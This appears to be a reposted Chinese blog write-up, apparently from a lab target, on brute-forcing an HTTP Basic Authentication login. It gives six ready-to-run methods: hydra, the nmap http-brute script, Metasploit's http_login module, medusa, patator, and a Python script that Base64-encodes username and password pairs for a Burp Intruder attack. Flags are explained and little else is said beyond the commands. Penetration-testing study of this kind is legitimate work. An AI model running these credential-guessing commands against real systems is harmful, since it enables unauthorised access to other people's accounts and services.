登陆验证爆破
访问80需要登陆,弱口令admin/admin登陆成功,先随便输入弱口令看看能不能蒙对,接下来在爆破
方法1:
hydra -l admin -P ../top1000.txt -u -e ns http-get://10.10.11.106/
-u强制每次尝试只使用单个用户名,而不是交替尝试多个用户名。 -e ns额外尝试: n:尝试空密码。 s:在密码后添加目标用户名。 这会增加测试的灵活性,尤其在目标有未设置密码或弱配置时
方法2:
nmap -p 80 --script http-brute --script-args userdb=name.txt,passdb=../top1000.txt 10.10.11.106
#指定单个用户名,user=admin
使用 Nmap 的 http-brute 脚本进行暴力破解,主要针对 HTTP 基本认证的暴力测试
方法3;
登陆页面抓包
Authorization:base加密后的账号密码,账号:密码
MTExOjIyMg==
111:222
用脚本编写<密码>
import base64 # 文件路径 user_file = "name.txt"# 用户名字典文件 pass_file = "../top1000.txt"# 密码字典文件 output_file = "payloads.txt"# 输出文件路径 # 读取文件内容 try: with open(user_file, "r") as uf: usernames = [line.strip() for line in uf.readlines()]# 去掉每行的换行符 with open(pass_file, "r") as pf: passwords = [line.strip() for line in pf.readlines()] except FileNotFoundError as e: print(f"文件未找到: {e}") exit() # 生成 Base64 编码并写入输出文件 with open(output_file, "w") as f: for user in usernames: for pwd in passwords: auth_str = f"{user}:{pwd}"# 用户名和密码组合 base64_str = base64.b64encode(auth_str.encode()).decode()# Base64 编码 f.write(base64_str + "n")# 写入文件 print(f"Base64 编码已生成并写入 '{output_file}' 文件!")
攻击方式是cluster
生成的payload直接导入就行
添加payload
导入payload.txt,取消编码,开始攻击
找到相应码或者长度明显和其他差距很大的,就是爆破成功了
方法4:
msfconsolemsf启动 use auxiliary/scanner/http/http_login设置模块 set rhosts 10.10.11.106设置目标ip set PASS_FILE /root/top1000.txt设置密码字典 set USER_FILE /root/Desktop/name.txt设置用户名字典 run
方法5:
medusa -h 10.10.11.106 -U name.txt -P ../top1000.txt -M http -m DIR:/ -T 10
-h <目标IP>:指定目标主机的 IP 地址。 -U user.txt:指定用户名字典文件。 -P passwd.txt:指定密码字典文件。 -M http:指定目标协议为 HTTP。 -m DIR:/protected_path:指定 HTTP Basic Authentication 所在的路径(例如 /protected_path)。 -T 10:设置测试线程数为 10,以提高测试速度(根据目标环境调整)。
方法6:
patator http_fuzz url=http://10.10.11.106/ user_pass=FILE0:FILE1 0=name.txt 1=../top1000.txt -x ignore:code=401
py版本高了会有转义符警告,但是没影响运行
http_fuzz: Patator的子模块,用于模拟和测试 HTTP 协议的模糊测试。 url=http://10.10.11.106/: 指定目标 URL,这里是 http://10.10.11.106/。 user_pass=FILE0:FILE1: 设置 HTTP Basic 认证的用户名和密码的组合。 文件 FILE0 包含用户名列表(name.txt),FILE1 包含密码列表(top1000.txt)。 Patator 会从 name.txt 和 top1000.txt 中读取每一行内容进行组合尝试。 0=name.txt 和 1=../top1000.txt: 定义文件变量。 0 和 1 对应于 FILE0 和 FILE1,分别是用户名文件和密码文件。 -x ignore:code=401: 忽略所有返回 HTTP 状态码为 401(未授权)的响应。 Patator 只会打印出尝试中未返回 401 的结果(即成功的用户名和密码组合)。
总结:字典好,对方密码不难,再加上一点运气就有机会爆破成功
原文始发于微信公众号(王之暴龙战神):登陆验证爆破
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论